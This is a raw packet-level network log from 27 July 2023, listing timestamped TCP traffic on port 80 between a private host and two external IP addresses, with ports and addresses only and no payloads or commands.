Jul 27, 2023 01:33:00.523724079 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523782015 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523802042 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523859024 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523916960 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523927927 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523994923 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524050951 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524064064 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524127007 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524146080 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524203062 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524280071 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524307966 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524373055 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524432898 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524456024 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524519920 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524527073 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524595022 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.524657011 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.524658918 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.526624918 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.569052935 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569134951 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569261074 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.569468975 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569530964 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569586992 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569610119 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.569647074 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569704056 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569705963 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.569762945 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569818974 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569829941 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.569878101 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569945097 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.569953918 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570029974 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570090055 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570144892 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570153952 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570204020 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570223093 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570285082 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570343018 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570417881 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570420980 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570483923 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570538044 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570579052 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570595026 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570614100 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570656061 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570728064 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570782900 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570792913 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570839882 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570852041 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.570897102 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.570951939 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571006060 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571027040 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.571084976 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571094036 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.571165085 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571223021 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571280003 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571297884 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.571341991 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571358919 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.571399927 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571461916 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571533918 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.571577072 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.571614027 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.615896940 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.615932941 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.615966082 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616027117 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616070032 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616142035 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616379023 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616405964 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616439104 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616441965 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616471052 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616493940 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616507053 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616538048 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616558075 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616573095 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616605997 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616619110 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616637945 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616668940 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616700888 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616714954 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616748095 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616750002 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616782904 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616813898 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616838932 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616838932 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616847038 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616878033 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616879940 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616913080 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616916895 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.616949081 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616980076 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.616998911 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.617013931 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.617046118 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.660562992 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.660636902 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.660675049 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.660698891 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661547899 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661609888 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661638975 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.661670923 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661734104 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661734104 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.661793947 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661818027 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.661854029 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661912918 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.661982059 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.661994934 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662055016 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662072897 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662112951 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662170887 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662178040 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662228107 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662290096 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662292957 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662350893 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662405014 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662437916 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662465096 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662519932 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662579060 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662636042 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662640095 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662640095 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.662689924 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.662748098 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.705215931 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.705275059 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.705357075 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.706743956 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.706800938 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.706845045 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.706867933 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.706887007 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.706927061 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.706943035 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.706979036 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707030058 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707078934 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707084894 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707142115 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707171917 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707185984 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707227945 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707242966 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707268000 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707312107 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707321882 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707359076 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707402945 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707442999 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707483053 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707494020 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707494020 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707525015 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707567930 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707576036 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707608938 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707648993 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707657099 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.707690001 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.707746029 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.749809980 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.749865055 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.749934912 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.751801014 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.751847029 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.751879930 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.751904964 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.751915932 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752041101 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.752218008 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752270937 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752291918 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752346039 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752371073 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752397060 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752417088 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752419949 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.752450943 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752479076 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752509117 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752535105 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752563953 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.752563953 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752592087 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752612114 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752625942 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752640009 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752655029 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752654076 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.752655029 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.752669096 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.752769947 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.794328928 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.794461966 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.794534922 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.794663906 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.796612978 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.796706915 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.796777010 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.796785116 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.796842098 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.796847105 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.796926022 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797014952 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797040939 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797121048 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797197104 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797272921 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797272921 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797341108 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797408104 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797414064 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797501087 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797585011 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797611952 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797668934 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797677994 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797739029 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797806025 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797820091 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.797878981 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.797981977 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.798006058 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.798077106 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.798144102 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.798218012 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.798218966 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.798285007 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.798290014 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.838870049 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.838941097 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.838999987 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.839104891 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.839155912 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.842434883 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.842585087 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.842663050 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.842664957 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.846437931 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.207945108 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.222218990 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.257057905 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.257575035 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.270541906 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.270723104 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.286856890 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.286945105 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.331321955 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.331357002 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.338769913 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.387522936 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.490900993 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.490952969 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.535623074 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.535669088 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.539705992 CEST	80	49722	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:01.590686083 CEST	49722	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:01.609334946 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.610085964 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.653570890 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.654751062 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.654829979 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.659162998 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.663835049 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.709125042 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709198952 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709239006 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709290028 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709322929 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.709345102 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709378004 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709408998 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.709422112 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709434032 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.709464073 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709497929 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709531069 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.709539890 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.709570885 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.754473925 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.754575968 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.754641056 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.754692078 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.754790068 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.754870892 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.754888058 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.754959106 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755028963 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755069971 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755135059 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755222082 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755249023 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755326986 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755398035 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755424023 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755486012 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755561113 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755577087 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755650043 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755717993 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755795002 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755810976 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755848885 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:01.755894899 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.755965948 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.756047964 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:01.756064892 CEST	49723	80	192.168.2.5	77.91.124.47
